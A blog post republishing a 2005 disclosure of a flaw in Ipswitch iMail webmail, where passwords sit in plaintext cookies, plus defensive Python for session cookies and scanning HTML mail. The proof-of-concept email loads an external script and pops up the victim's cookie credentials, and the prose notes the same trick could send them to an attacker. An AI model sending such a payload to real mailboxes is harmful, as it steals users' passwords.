ipswitch iMail webmail: XSS and cookie password vulnerability

By chri - Posted on 18 October 2008

While cleaning up my computer I found this advisory lying around.
It was discovered around June 2005 while studying at Groep T. At that time we didn't really know the XSS principles, so we didn't report it as such but as a simple cookie vulnerability.

IPswitch didn't fix the problems as they were 'working on a complete new version'. We did report it to cert.org.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Security Advisory
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Severity: High
     Title: ipswitch iMail webmail: cookie password vulnerability
      Date: June 08, 2005
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Credits
=======

Peter Bulckens
Christophe Vandeplas


Description
===========

Because the user's password is stored in plain text in a cookie, an
attacker can read it with client-side scripting such as JavaScript
contained in the HTML of a mail.
The vulnerability is rated high severity because the attack can be
carried out without the victim noticing it.
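The fix for the weakness described above is to never hand the password to the browser at all: the cookie should carry only an opaque session token, flagged HttpOnly so page script cannot read it. The following Python is an added example written for this post, not iMail's own code; the cookie name "session", the in-memory session table and the function names are assumptions, and the audited header value is constructed.

```python
import secrets
from typing import Dict, List, Optional, Tuple
from http.cookies import SimpleCookie

# Constructed in-memory session store standing in for a server-side table.
# The cookie name "session" and the function names are this example's
# assumptions, not iMail's own cookie names or API.
_SESSIONS: Dict[str, str] = {}


def issue_session_cookie(username: str) -> Tuple[str, str]:
    """Log a user in and return (Set-Cookie header value, token).

    The cookie carries only a random opaque token; the password itself is
    never sent back to the browser, so script in a mail has nothing to read.
    """
    token = secrets.token_urlsafe(32)
    _SESSIONS[token] = username
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True  # hidden from document.cookie
    cookie["session"]["secure"] = True    # only sent over HTTPS
    cookie["session"]["path"] = "/"
    return cookie.output(header="").strip(), token


def resolve_session(cookie_header: str) -> Optional[str]:
    """Map an incoming Cookie header back to a username, or None."""
    cookie = SimpleCookie()
    cookie.load(cookie_header)
    morsel = cookie.get("session")
    return _SESSIONS.get(morsel.value) if morsel else None


def audit_set_cookie(header: str, known_secrets: List[str]) -> List[str]:
    """Flag the two weaknesses the advisory describes in a Set-Cookie header:
    a secret stored in the clear as the cookie value, and a cookie that page
    script can read because the HttpOnly flag is absent."""
    findings: List[str] = []
    cookie = SimpleCookie()
    cookie.load(header)
    for name, morsel in cookie.items():
        if morsel.value in known_secrets:
            findings.append(f"{name}: value is a cleartext secret")
        if not morsel["httponly"]:
            findings.append(f"{name}: no HttpOnly flag, readable via document.cookie")
    return findings


if __name__ == "__main__":
    # Constructed vulnerable header in the style the advisory describes.
    print(audit_set_cookie("myICalPassword=hunter2; Path=/", ["hunter2"]))
    header, _ = issue_session_cookie("alice")
    print(header, audit_set_cookie(header, ["hunter2"]))
```

HttpOnly stops the cookie-reading half of the attack even where a script does get into the page; keeping the password server-side removes the prize altogether, which is the change that actually matters.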


Proof of Concept
================
--[ Structure Description

The malicious mail should not contain any  nor  tag, but
should be declared as a text/html content type.

To circumvent the webmail's internal scripting protection, the script
should not be embedded in the email; an external script should be used
instead.

When the victim hovers over the document, the password pops up on the
screen. With a suitably modified script, the page could instead call a
URL with the username and password as arguments and add the data to the
attacker's password database, without the victim noticing it.

--[ Email Source

Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Subject: ipswitch iMail webmail: cookie password vulnerability

<script type="text/javascript"
src="http://www.netspade.com/articles/javascript/cookies.js"></script>
<div href="#" onmouseover="alert(getCookie('myICalUserName') + ' '
+getCookie('myICalPassword'))">
&nbsp; <br>
Vulnerability discovered by Peter Bulckens &
Christophe Vandeplas&nbsp; <br>
&nbsp; <br>
</div>
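On the filtering side, the proof of concept above gets through because the webmail only blocked inline script: an external src and an event-handler attribute were enough. The following Python is an added example written for this post, not code from the advisory or from iMail; the class and function names are its own, and the benign mail is constructed. It scans an HTML mail body for the three hooks that matter here (script elements inline or external, on* handlers, javascript: URLs) and returns a render/don't-render decision.

```python
from html.parser import HTMLParser
from typing import List, Tuple

Finding = Tuple[str, str]


class ActiveContentScanner(HTMLParser):
    """Collect the hooks the advisory's mail relies on: <script> elements
    (inline or external), on* event-handler attributes and javascript: URLs.
    Class and function names are this example's own assumptions."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Finding] = []

    def handle_starttag(self, tag, attrs):
        attr_map = dict(attrs)
        if tag == "script":
            # An external src is exactly what slipped past an inline-only filter.
            self.findings.append(("script", attr_map.get("src") or "inline"))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", f"{tag}@{name}"))
            if value and value.strip().lower().startswith("javascript:"):
                self.findings.append(("javascript-url", f"{tag}@{name}"))


def scan_html_mail(body: str) -> List[Finding]:
    """Return every active-content finding in an HTML mail body."""
    scanner = ActiveContentScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


def should_render(body: str) -> bool:
    """Policy: a mail with any active content is not rendered as HTML."""
    return not scan_html_mail(body)


# Body of the proof-of-concept mail from the advisory above.
POC_MAIL = """<script type="text/javascript"
src="http://www.netspade.com/articles/javascript/cookies.js"></script>
<div href="#" onmouseover="alert(getCookie('myICalUserName') + ' '
+getCookie('myICalPassword'))">
&nbsp; <br>
Vulnerability discovered by Peter Bulckens &
Christophe Vandeplas&nbsp; <br>
&nbsp; <br>
</div>"""

# Constructed benign mail for comparison.
BENIGN_MAIL = '<p>Meeting moved to 3pm, see <a href="https://example.org/agenda">agenda</a>.</p>'

if __name__ == "__main__":
    for kind, where in scan_html_mail(POC_MAIL):
        print(kind, where)
    print("render PoC:", should_render(POC_MAIL), "render benign:", should_render(BENIGN_MAIL))
```

A scan-and-refuse policy is the simplest correct answer for a webmail; a sanitizer that rewrites the HTML to an allowlist of tags and attributes is the next step, but the point the advisory makes is that blocking only inline `<script>` is not a filter at all.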
